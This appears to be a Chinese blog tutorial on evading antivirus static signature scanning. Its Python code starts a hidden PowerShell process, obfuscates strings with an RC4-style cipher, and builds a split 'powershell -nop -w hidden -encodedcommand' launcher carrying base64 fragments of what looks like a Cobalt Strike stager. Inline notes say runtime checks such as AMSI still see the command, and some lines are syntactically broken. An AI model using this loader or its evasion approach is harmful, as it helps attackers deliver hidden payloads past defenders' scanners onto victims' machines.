其实杀软还是很好骗的,我们要想象杀软是如何查杀病毒的。
杀软首先做的是静态扫描:读取落地/上传的可执行文件的二进制内容,查找是否含有已知病毒 payload 的特征(签名)。
其次是运行时的行为检测:可执行文件一旦执行敏感操作(例如拉起隐藏窗口的 PowerShell、解码并执行内存中的代码),杀软会立刻评估这条命令的危险程度。本文的方法只能做到第一层——让文件上传/落地时不被查杀;第二层我还比较难做到,因为运行时真正执行的命令是否"貌似正常的安全逻辑"要靠自己构造。尤其要注意:对 PowerShell 而言,拆分、编码后的命令在执行前会被重新拼回明文并再次送入脚本扫描接口(AMSI),进程创建日志里看到的也是完整命令行,所以单纯的字符串拆分对运行时检测没有帮助。
import base64
import os
import glob
import subprocess as sp
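class PowerShell:
    """Thin wrapper that pipes a script into a hidden, non-interactive PowerShell.

    Adapted from scapy's test helper.  The process is started with
    ``-Command -`` so the script text is fed through stdin by :meth:`run`;
    stderr is folded into stdout.  Windows-only: ``subprocess.STARTUPINFO``
    and ``STARTF_USESHOWWINDOW`` do not exist on other platforms.

    Fixes relative to the published listing: the constructor was spelled
    ``init`` (underscores lost in rendering) so ``PowerShell('GBK')`` raised
    TypeError, and :meth:`_where` called the ``glob`` *module* instead of
    ``glob.glob``.  Curly quotes around the literals were also a SyntaxError.
    """

    # from scapy
    def __init__(self, coding):
        """Start PowerShell reading commands from stdin; *coding* is the text encoding used by :meth:`run`."""
        cmd = [self._where("PowerShell.exe"),
               "-NoLogo", "-NonInteractive",  # Do not print headers
               "-Command", "-"]  # Listen commands from stdin
        startupinfo = sp.STARTUPINFO()
        # Hide the console window of the child process.
        startupinfo.dwFlags |= sp.STARTF_USESHOWWINDOW
        self.popen = sp.Popen(cmd, stdout=sp.PIPE, stdin=sp.PIPE,
                              stderr=sp.STDOUT, startupinfo=startupinfo)
        self.coding = coding

    def __enter__(self):
        return self

    def __exit__(self, a, b, c):
        # Kill unconditionally: a script that is still running must not outlive the block.
        self.popen.kill()

    def run(self, cmd, timeout=15):
        """Send *cmd* to PowerShell's stdin and return ``(stdout_text, errs)``.

        ``errs`` is always ``None`` because stderr is redirected into stdout.
        On timeout the process is killed and whatever output it produced is
        returned.  ``communicate`` closes stdin, so one instance can run a
        single script; create a new ``PowerShell`` for the next one.
        """
        b_cmd = cmd.encode(encoding=self.coding)
        try:
            b_outs, errs = self.popen.communicate(b_cmd, timeout=timeout)
        except sp.TimeoutExpired:
            self.popen.kill()
            b_outs, errs = self.popen.communicate()
        return b_outs.decode(encoding=self.coding), errs

    @staticmethod
    def _where(filename, dirs=None, env="PATH"):
        """Locate *filename*: as given, then in ``.``, each entry of ``$env`` and *dirs*.

        Returns the first normalised match.  Raises ``IOError`` when nothing
        matches; ``KeyError`` if *env* is not set in the environment.
        """
        if dirs is None:
            dirs = []
        elif not isinstance(dirs, list):
            dirs = [dirs]
        if glob.glob(filename):
            return filename
        search = [os.curdir] + os.environ[env].split(os.path.pathsep) + dirs
        for directory in search:
            for match in glob.glob(os.path.join(directory, filename)):
                if match:
                    return os.path.normpath(match)
        raise IOError("File not found: %s" % filename)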
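class fixcode:
    """RC4 obfuscation helpers used to wrap the PowerShell launcher string.

    Security note: RC4 is a broken stream cipher and the key is a literal in
    the same file, so this is *obfuscation* against static string matching,
    not confidentiality.  The bytes handed to ``base64`` are the UTF-8
    encoding of the XOR-ed code points (not raw keystream bytes), so the
    output is not interoperable with a standard RC4 implementation; it only
    round-trips through :meth:`rc4_fix`.  Each call builds a fresh S-box, so
    the same key always yields the same keystream (no nonce).

    Fixes relative to the published listing: curly quotes were a SyntaxError,
    methods are now ``@staticmethod`` (they were called as ``fixcode.x(...)``
    anyway), an empty key raises ``ValueError`` instead of ``ZeroDivisionError``,
    and the duplicated PRGA loop lives in one private helper.
    """

    @staticmethod
    def rc4_run(key="init_key", message="init_message"):
        """Obfuscate *message* with *key*; returns base64 text (see class note)."""
        print("RC4加密主函数")
        s_box = fixcode.rc4_init_sbox(key)
        return str(fixcode.rc4_excrypt_run(message, s_box))

    @staticmethod
    def rc4_fix(key="init_key", message="init_message"):
        """Reverse :meth:`rc4_run`: base64 text in, original str out."""
        # print("RC4解密主函数调用成功")
        s_box = fixcode.rc4_init_sbox(key)
        return fixcode.rc4_excrypt_fix(message, s_box)

    @staticmethod
    def rc4_init_sbox(key):
        """Key-scheduling algorithm: return the 256-entry permutation for *key*.

        A key shorter than 256 characters is cycled via ``i % len(key)``;
        the key is consumed as code points (``ord``), so non-ASCII keys add
        values above 255 before the modulo.  Raises ``ValueError`` on an
        empty key.
        """
        if not key:
            raise ValueError("RC4 key must not be empty")
        s_box = list(range(256))
        j = 0
        for i in range(256):
            j = (j + s_box[i] + ord(key[i % len(key)])) % 256
            s_box[i], s_box[j] = s_box[j], s_box[i]
        return s_box

    @staticmethod
    def _keystream_xor(text, box):
        """PRGA: XOR each code point of *text* with the next keystream byte.

        Mutates *box* in place (as the original loops did); callers pass a
        freshly scheduled S-box each time.  Because the XOR is on code
        points, a result landing in the surrogate range would fail the
        later UTF-8 encode -- a limitation of the original design.
        """
        out = []
        i = j = 0
        for ch in text:
            i = (i + 1) % 256
            j = (j + box[i]) % 256
            box[i], box[j] = box[j], box[i]
            k = box[(box[i] + box[j]) % 256]
            out.append(chr(ord(ch) ^ k))
        return "".join(out)

    @staticmethod
    def rc4_excrypt_run(plain, box):
        """XOR *plain* against the keystream from *box*, then UTF-8 + base64 encode."""
        print("调用加密程序成功。")
        cipher = fixcode._keystream_xor(plain, box)
        return str(base64.b64encode(cipher.encode('utf-8')), 'utf-8')

    @staticmethod
    def rc4_excrypt_fix(plain, box):
        """Base64 + UTF-8 decode *plain*, then XOR against the keystream from *box*."""
        print("调用解密程序成功。")
        decoded = bytes.decode(base64.b64decode(plain.encode('utf-8')))
        return fixcode._keystream_xor(decoded, box)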
# Illustrative only: the author says this whole section can be deleted; the
# point is that chunking and encoding a string can slip past some signature
# scans.
#
# NOTE(review): this is the launcher.  Lines 108-113 concatenate to the text
# "powershell -nop -w hidden -encodedcommand", and fuckme5/fuckme6 look like
# fragments of the base64 payload for -EncodedCommand (not decoded here);
# `fuckyou` appears to be a placeholder the reader is meant to replace.
# Splitting literals only defeats file-level string matching: the reassembled
# command line is visible unchanged to process-creation logging and, for
# PowerShell, to the script-scanning interface (AMSI) when it executes --
# exactly the runtime check the introduction admits is not bypassed.
# As published the mixed straight/curly quotes make these lines a
# SyntaxError, and rc4_fix below is handed a placeholder string instead of
# `powshellsrun`, so `reworks` is not a valid command.
fuckyou = “cs的部分powershell==”
fuckme5 = “JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADo”
fuckme6 = “ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhAFcALwBpAFMAaABiAD”
# Fragments are joined 6 + 5 + placeholder, i.e. not in the order they were
# listed -- presumably deliberate, but confirm before relying on it.
safe360 = fuckme6 + fuckme5 + fuckyou
fuckme = “powershell”
fuckme1 = " -n"
fuckme2 = “-w "
fuckme3 = “hid”
fuckme4 = " -encode”
loveme = fuckme + fuckme1+'op ’ + fuckme2 + fuckme3+ ‘den’+ fuckme4+‘dcommand’
# Full command line = launcher flags + payload fragments.
safe361=loveme+safe360
# Obfuscate with the hard-coded key "dalizi" and print the base64 result.
powshellsrun = fixcode.rc4_run(“dalizi”, safe361)
print(“这是加密编码” + powshellsrun)
print(’>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>’)
# Decrypts a placeholder ("too long to paste, test it yourself"), not
# `powshellsrun`; the real flow would pass the encrypted text here.
reworks = fixcode.rc4_fix(“dalizi”,“这里加密过长,自己可测试”)
print(“revie,这是解密后的编码” + reworks)
# Hands the decrypted text to a hidden PowerShell (GBK-encoded stdin).
with PowerShell(‘GBK’) as ps:
    outs, errs = ps.run(reworks)
修改后使用即可绕过基于特征的静态查杀(运行代码需要自己构造)。注意:这只对文件落地时的静态扫描有效;进程创建日志、AMSI 等运行时检测看到的仍是拼接回来的完整明文命令,并不会被这种拆分/编码方式绕过。